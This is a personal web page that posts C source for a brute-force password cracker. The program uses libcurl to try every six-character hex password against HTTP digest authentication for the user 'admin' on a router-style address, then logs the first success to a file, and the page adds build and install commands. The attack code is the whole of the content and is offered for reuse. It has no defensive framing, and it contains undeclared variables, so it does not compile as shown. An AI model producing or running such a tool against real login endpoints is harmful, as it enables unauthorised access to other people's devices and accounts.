top of page

Brute force password cracker

#include <stdlib.h>

#include <string.h>

#include <stdio.h>

#include <curl/curl.h>

 

size_t write_data(void *buffer, size_t size, size_t nmemb, void *userp) ;

 

int main(void)

{

  CURL *curl;

  CURLcode res;

  long httpStatus ;

  int i ;

  char uid[256] ;

  char pwd[256] ;

  int  ix[256] ;

  char *alphabet ;

  int alphabetLength ;

  int passwordLength =6 ;

  int guess = 0 ;

  FILE *f ;

  struct curl_slist *hdrs ;

 

  time(&timer);

  tm_info = localtime(&timer);

 

  strftime(buffer, 25, "%Y-%m-%d %H:%M:%S", tm_info);

 

 

  strcpy( uid, "admin" ) ;  // Change this to any user name you know

 

  alphabet = "0123456789ABCDEF" ;    // define all possible chars in password here

  alphabetLength = strlen( alphabet) ;

 

// Log some stuff to file - Note file is overwritten by this call

  f = fopen( "/var/tmp/bruteforce", "w+" ) ;

  setbuf(f, NULL);

  fprintf( f, "Started at %s\n", buffer ) ;

  fprintf( f, "Alphabet: %s\n", alphabet ) ;

  fprintf( f, "Username: %s\n\n", uid ) ;

  fsync( f ) ;

 

  curl = curl_easy_init();

  if(curl) {

    hdrs = 0L ;

    hdrs = curl_slist_append(hdrs, "User-Agent:Unknown");

    res = curl_easy_setopt(curl, CURLOPT_HTTPHEADER, hdrs);

    curl_easy_setopt(curl, CURLOPT_URL, "http://192.168.1.1:4567");

    curl_easy_setopt(curl, CURLOPT_HEADER, 1);

    curl_easy_setopt(curl, CURLOPT_HTTPAUTH, CURLAUTH_DIGEST);

    curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_data);

 

    for( i =0 ; i<256 ; i++ ) ix[i] = 0 ;

 

    for( i=0 ; i<passwordLength ; i++ )

        pwd[i] = alphabet[0] ;

 

    pwd[passwordLength] = '\0' ;

 

    while( strlen(pwd)<32 )  {

        guess++ ;

        curl_easy_setopt(curl, CURLOPT_USERNAME, uid );

        curl_easy_setopt(curl, CURLOPT_PASSWORD, pwd );

 

        res = curl_easy_perform(curl);

 

        curl_easy_getinfo( curl, CURLINFO_RESPONSE_CODE, &httpStatus ) ;

        switch( httpStatus ) {

        case 200 :

                fprintf( f, "***************************\n" ) ;

                fprintf( f, "SUCCESS User: %s:%s\n", uid, pwd ) ;

                fprintf( f, "***************************\n" ) ;

                fprintf( stdout, "***************************\n" ) ;

                fprintf( stdout, "SUCCESS User: %s:%s\n", uid, pwd ) ;

                fprintf( stdout, "***************************\n" ) ;

                exit( 0 ) ;

                break ;

        case 401:

                break ;

        default:

                fprintf( f, ">>>>> Err %ld, User: %s:%s\n", httpStatus, uid, pwd ) ;

                break ;

        }

        if( (guess % 10000) == 0 ) {

                fprintf( f, "%s:%s\tErr: %ld\n", uid, pwd, httpStatus ) ;

                fsync( f ) ;

        }

 

// count password in base(x)   [ x = alphabet Length ]

        for( i=0 ; i<256 ; i++ ) {

            ix[i]++ ;

            if( ix[i] >= alphabetLength ) {

                ix[i] = 0 ;

                pwd[i] = alphabet[0] ;

            } else {

                pwd[i] = alphabet[ix[i]] ;

                break ;

            }

        }

    }

    curl_easy_cleanup(curl);

  }

  return 0;

}

 

// Copied from example - thanks someone (sorry forgot your id)

size_t write_data(void *buffer, size_t size, size_t nmemb, void *userp)

{

   return size * nmemb;

}

 

 

While I am working to find out more - here's a brute force password guesser. Don't slam me for bad code, I just wanted something quick. Iam sure you can find more if you need examples.

Alphabet = the set of characters to use in the guesses

User = the username whose password is being cracked

 

This writes brief status to /var/tmp/bruteforce

There's a lot of opportunity to improve this - but I want to concentrate on the task at hand...

Build command

gcc bf.c -lcurl -o bf

 

If necessary libcurl can be sourced (debian) using:

apt-get install libcurl4-gnutls-dev

bf.c

@HenryOfBabylon

Henry (dot) Rawlinson at yandex & then dotcom

bottom of page